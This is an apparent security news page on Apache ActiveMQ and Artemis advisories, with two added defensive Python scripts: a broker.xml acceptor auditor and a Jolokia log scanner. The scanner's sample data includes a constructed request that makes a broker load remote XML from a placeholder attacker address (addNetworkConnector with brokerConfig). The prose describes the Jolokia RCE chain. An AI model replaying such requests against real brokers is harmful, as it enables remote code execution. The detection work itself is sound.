Apache ActiveMQ and Artemis Flaws Enable Security Bypass and Multiple Attacks
German authorities (dCERT) issued four advisories between March 23 and April 24, 2026 for Apache ActiveMQ Artemis and Apache ActiveMQ Classic, covering vulnerabilities in the broker, client, and web components. One advisory warns that a flaw in Apache ActiveMQ Artemis lets attackers bypass security controls, raising the risk of unauthorized access to, or actions within, affected messaging environments.
Separate advisories report multiple vulnerabilities in Apache ActiveMQ across the Client, Broker, and Web components, a broader exposure for organizations that run the platform in enterprise integrations and application back ends. The notices call for prompt review and patching of affected ActiveMQ deployments.
Timeline
Apr 24, 2026
dCERT publishes advisory on multiple Apache ActiveMQ vulnerabilities
dCERT issued Advisory 2026-1234 for Apache ActiveMQ covering multiple vulnerabilities. It was published as a new security notice separate from the earlier Apache ActiveMQ advisories already recorded.
Apr 10, 2026
dCERT publishes advisory on multiple Apache ActiveMQ vulnerabilities
dCERT issued Advisory 2026-1018 for Apache ActiveMQ covering multiple vulnerabilities. The advisory was published as a new security notice separate from earlier Apache ActiveMQ advisories.
Apr 8, 2026
dCERT publishes advisory on multiple Apache ActiveMQ vulnerabilities
dCERT issued Advisory 2026-0972 covering multiple vulnerabilities affecting Apache ActiveMQ Client, Broker, and Web components.
Mar 23, 2026
dCERT publishes advisory on Apache ActiveMQ Artemis security bypass flaw
dCERT issued Advisory 2026-0799 for Apache ActiveMQ Artemis describing a vulnerability that allows bypassing security measures.
Related Stories

Apache ActiveMQ Flaws Enable Path Traversal and TLS DoS
Apache disclosed two vulnerabilities affecting multiple **ActiveMQ** components, including Client, Broker, and bundled distributions. **CVE-2026-33227** is a low-severity pathname restriction flaw that lets an authenticated user manipulate a supplied `key` value to traverse the classpath in two cases: when creating a **STOMP** consumer and when browsing messages through the web console. Apache warned the issue could expose classpath resource loading and potentially be chained with another attack. The flaw affects the 5.x branch before **5.19.3** and the 6.x branch from **6.0.0** before **6.2.2**, but Apache said those initial fixes were incomplete on Windows because of path separator handling, and recommended upgrading instead to **5.19.4** or **6.2.3**. Apache also published **CVE-2026-39304**, an important denial-of-service flaw in ActiveMQ's **NIO SSL transports** caused by incorrect handling of **TLS 1.3 `KeyUpdate`** messages. A client can repeatedly trigger updates and exhaust broker memory in the SSL engine, causing out-of-memory crashes and service disruption. Apache added that related handshake handling is also broken for earlier TLS versions such as **TLS 1.2**, though those cases lead to hung connections rather than memory exhaustion. The DoS issue affects the 5.x branch before **5.19.4** and the 6.x branch from **6.0.0** before **6.2.4**; users are advised to upgrade to **5.19.5** or **6.2.4**.
3 weeks ago
Authentication Bypass in Apache Artemis Core Downstream Federation (CVE-2026-27446)
**CVE-2026-27446** is a critical *missing authentication for a critical function* (CWE-306) in **Apache Artemis** and **Apache ActiveMQ Artemis** that enables an unauthenticated remote attacker to abuse the **Core protocol** to force a target broker to establish an outbound Core downstream federation connection to an attacker-controlled rogue broker. If successful, the attacker can **inject arbitrary messages into any queue** and/or **exfiltrate messages from any queue** via the rogue broker, particularly in environments that allow **incoming Core protocol connections from untrusted sources** and **outgoing Core protocol connections to untrusted destinations**. Impacted versions include **Apache Artemis 2.50.0–2.51.0** and **Apache ActiveMQ Artemis 2.11.0–2.44.0**; upgrading to **Apache Artemis 2.52.0** is recommended to remediate. Mitigations include removing Core protocol support from untrusted-facing acceptors (notably the default `artemis` acceptor on port `61616` if configured to allow Core) or enforcing **two-way TLS (mTLS)** to require certificate-based client authentication before protocol negotiation. The Centre for Cybersecurity Belgium highlighted the high severity (reported as **CVSS 9.3**) and noted no vendor warning of active exploitation as of early March 2026, while emphasizing that **ActiveMQ-family products have been repeatedly targeted historically** for follow-on activity such as ransomware deployment.
1 month ago
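As an added example (not code from the Apache advisory, the Belgian CCB note or the Artemis project): a Python check that reads an Artemis `broker.xml` and flags every acceptor that will accept a Core connection without requiring a client certificate, with a weak configuration and a hardened one side by side. The file contents, acceptor names, port 61617, keystore paths and passwords are constructed placeholders. The check assumes Artemis' documented default that an acceptor with no `protocols=` list enables every protocol, and it treats only `sslEnabled=true` together with `needClientAuth=true` as the two-way TLS the advisory recommends.

```python
"""Audit an Apache ActiveMQ Artemis broker.xml for acceptors that accept the Core
protocol without requiring a client certificate (the exposure CVE-2026-27446 needs)."""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed excerpt resembling a stock install: the "artemis" acceptor on 61616
# speaks Core (among other protocols) with no TLS client authentication.
WEAK_BROKER_XML = """\
<configuration xmlns="urn:activemq">
  <core xmlns="urn:activemq:core">
    <acceptors>
      <acceptor name="artemis">tcp://0.0.0.0:61616?protocols=CORE,AMQP,STOMP,HORNETQ,MQTT,OPENWIRE;useEpoll=true</acceptor>
      <acceptor name="amqp">tcp://0.0.0.0:5672?protocols=AMQP</acceptor>
      <acceptor name="stomp">tcp://0.0.0.0:61613?protocols=STOMP</acceptor>
    </acceptors>
  </core>
</configuration>
"""

# The same file after the advisory's two mitigations: CORE removed from the
# acceptor that faces untrusted clients, and a dedicated Core acceptor (for
# federation/cluster peers) that requires mutual TLS. Port 61617, keystore
# paths and passwords are placeholders.
HARDENED_BROKER_XML = """\
<configuration xmlns="urn:activemq">
  <core xmlns="urn:activemq:core">
    <acceptors>
      <acceptor name="artemis">tcp://0.0.0.0:61616?protocols=AMQP,STOMP,MQTT,OPENWIRE;useEpoll=true</acceptor>
      <acceptor name="core-mtls">tcp://0.0.0.0:61617?protocols=CORE;sslEnabled=true;keyStorePath=/var/lib/artemis/etc/broker.p12;keyStorePassword=CHANGEME;trustStorePath=/var/lib/artemis/etc/peers.p12;trustStorePassword=CHANGEME;needClientAuth=true</acceptor>
    </acceptors>
  </core>
</configuration>
"""


def parse_acceptor(url):
    """Split 'tcp://host:port?k=v;k=v' into (host, port, params); keys lower-cased.
    broker.xml uses ';' between parameters, but '&amp;' also appears in the wild."""
    parts = urlsplit(url.strip())
    params = {}
    for item in parts.query.replace("&", ";").split(";"):
        if "=" in item:
            key, value = item.split("=", 1)
            params[key.strip().lower()] = value.strip()
    return parts.hostname, parts.port, params


def _local(tag):
    """Strip the XML namespace so 'acceptor' matches under urn:activemq:core."""
    return tag.rsplit("}", 1)[-1]


def audit_acceptors(broker_xml):
    """Return [(acceptor name, host, port, reason)] for every acceptor that will
    accept a Core connection from any peer without a client certificate."""
    findings = []
    for el in ET.fromstring(broker_xml).iter():
        if _local(el.tag) != "acceptor":
            continue
        name = el.get("name", "?")
        host, port, params = parse_acceptor(el.text or "")
        protocols = params.get("protocols")
        # Artemis enables every protocol when 'protocols' is omitted (documented default).
        speaks_core = protocols is None or "core" in [
            p.strip().lower() for p in protocols.split(",")]
        if not speaks_core:
            continue
        mtls = (params.get("sslenabled", "false").lower() == "true"
                and params.get("needclientauth", "false").lower() == "true")
        if mtls:
            continue
        reason = ("Core enabled implicitly (no protocols= list)" if protocols is None
                  else "CORE listed in protocols=") + "; no mutual TLS"
        findings.append((name, host, port, reason))
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_BROKER_XML), ("hardened", HARDENED_BROKER_XML)):
        print(label, audit_acceptors(doc))
```

The check cannot know which acceptors face untrusted networks, so treat each finding as a question ("does anything outside the trust boundary reach this port?") rather than a verdict; a Core acceptor bound to a management-only interface may be acceptable without mTLS, while a `0.0.0.0` binding behind a permissive firewall is exactly the precondition the advisory describes.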
Apache ActiveMQ Jolokia MBean Flaw Enables Authenticated RCE
Apache disclosed **CVE-2026-34197**, an important-severity remote code execution flaw in **Apache ActiveMQ Broker** and **Apache ActiveMQ Classic** that lets authenticated users execute code through the Jolokia JMX-HTTP bridge exposed at `/api/jolokia/`. The default Jolokia access policy permits `exec` operations on ActiveMQ MBeans, allowing attackers to call methods such as `BrokerService.addNetworkConnector(String)` and `BrokerService.addConnector(String)` with a crafted discovery URI. The exploit abuses the VM transport `brokerConfig` parameter to load a remote Spring XML application context via `ResourceXmlApplicationContext`, and Spring may instantiate singleton beans before ActiveMQ validates the configuration, enabling arbitrary code execution in the broker JVM, including through methods like `Runtime.exec()`. Apache said the issue affects versions before **5.19.4** in the 5.x line and from **6.0.0** before **6.2.3** in the 6.x line, and recommends upgrading to **5.19.5** or **6.2.3**; the vulnerability was reported by Naveen Sunkavally of Horizon3.ai.
1 week ago
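As an added example (not code from the Apache advisory or the Horizon3.ai report): a Python scanner over constructed reverse-proxy records that flags Jolokia `exec` requests against ActiveMQ MBeans, escalating when the operation is `addConnector` or `addNetworkConnector` and again when an argument carries `brokerConfig=`, the parameter the advisory names. The record layout (`method`, `path`, `body`), the sample bodies, the 203.0.113.5 address and the argument URIs are constructed placeholders, not a working payload. Both Jolokia request forms are parsed: the JSON POST body (single object or bulk array) and the GET path form, where `!/` escapes a literal slash.

```python
"""Hunt for CVE-2026-34197-style Jolokia abuse in web access records.
The sample records are constructed; the field layout (method, path, body) is what a
reverse proxy or WAF in front of /api/jolokia/ could supply."""
import json
import re
from urllib.parse import unquote

# Operations the advisory names as the entry point on the Broker MBean.
DANGEROUS_OPS = ("addNetworkConnector", "addConnector")

SAMPLE_RECORDS = [
    # Normal console traffic: an attribute read, never flagged.
    {"method": "GET", "body": "",
     "path": "/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost/TotalConsumerCount"},
    # Constructed JSON POST shaped like the advisory's description: a VM transport URI
    # whose brokerConfig parameter points at attacker-hosted XML (203.0.113.5 is a
    # documentation address; this is not a working payload).
    {"method": "POST", "path": "/api/jolokia/",
     "body": json.dumps({"type": "exec",
                         "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
                         "operation": "addNetworkConnector(java.lang.String)",
                         "arguments": ["vm://rogue?brokerConfig=http://203.0.113.5/broker.xml"]})},
    # Same operation family in Jolokia's GET form; '/' inside an argument is escaped as '!/'.
    {"method": "GET", "body": "",
     "path": "/api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost/addConnector/tcp:!/!/0.0.0.0:61700"},
    # Bulk request mixing a harmless read with an exec that is still worth a look.
    {"method": "POST", "path": "/api/jolokia/",
     "body": json.dumps([
         {"type": "read", "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
          "attribute": "MemoryPercentUsage"},
         {"type": "exec",
          "mbean": "org.apache.activemq:type=Broker,brokerName=localhost,destinationType=Queue,destinationName=ORDERS",
          "operation": "purge", "arguments": []}])},
]


def _from_body(body):
    """Jolokia accepts one JSON request object or a bulk array of them."""
    try:
        data = json.loads(body or "")
    except ValueError:
        return []
    return data if isinstance(data, list) else [data]


def _from_path(path):
    """Parse Jolokia's GET form /exec/<mbean>/<operation>/<arg>/...; '!/' escapes a
    literal slash and '!!' a literal '!', so split only on unescaped slashes."""
    idx = path.find("/exec/")
    if idx < 0:
        return []
    rest = path[idx + len("/exec/"):]
    parts = [unquote(p).replace("!/", "/").replace("!!", "!")
             for p in re.split(r"(?<!!)/", rest) if p]
    if len(parts) < 2:
        return []
    return [{"type": "exec", "mbean": parts[0], "operation": parts[1], "arguments": parts[2:]}]


def classify(req):
    """Severity for one Jolokia request dict, or None if it is not an exec on ActiveMQ."""
    if req.get("type") != "exec" or not str(req.get("mbean", "")).startswith("org.apache.activemq"):
        return None
    args = " ".join(str(a) for a in (req.get("arguments") or []))
    if "brokerConfig=" in args:
        return "critical"       # remote Spring XML load through the VM transport
    if str(req.get("operation", "")).split("(")[0] in DANGEROUS_OPS:
        return "high"           # connector creation with a caller-chosen URI
    return "medium"             # any exec on an ActiveMQ MBean deserves review


def scan(records):
    """Return [(record index, severity, operation)] for every flagged Jolokia request."""
    hits = []
    for i, rec in enumerate(records):
        path = rec.get("path", "")
        if "jolokia" not in path.lower():
            continue
        reqs = _from_body(rec.get("body")) if rec.get("method") == "POST" else _from_path(path)
        for req in reqs:
            sev = classify(req)
            if sev:
                hits.append((i, sev, str(req.get("operation", ""))))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_RECORDS):
        print(hit)
```

Because the default policy allows `exec`, the "medium" tier will be noisy on brokers whose operators use the console or scripts to purge or pause destinations; the value is in the "high" and "critical" tiers, which correspond to the operations and the parameter the advisory names, and which a legitimate administrator rarely invokes over HTTP.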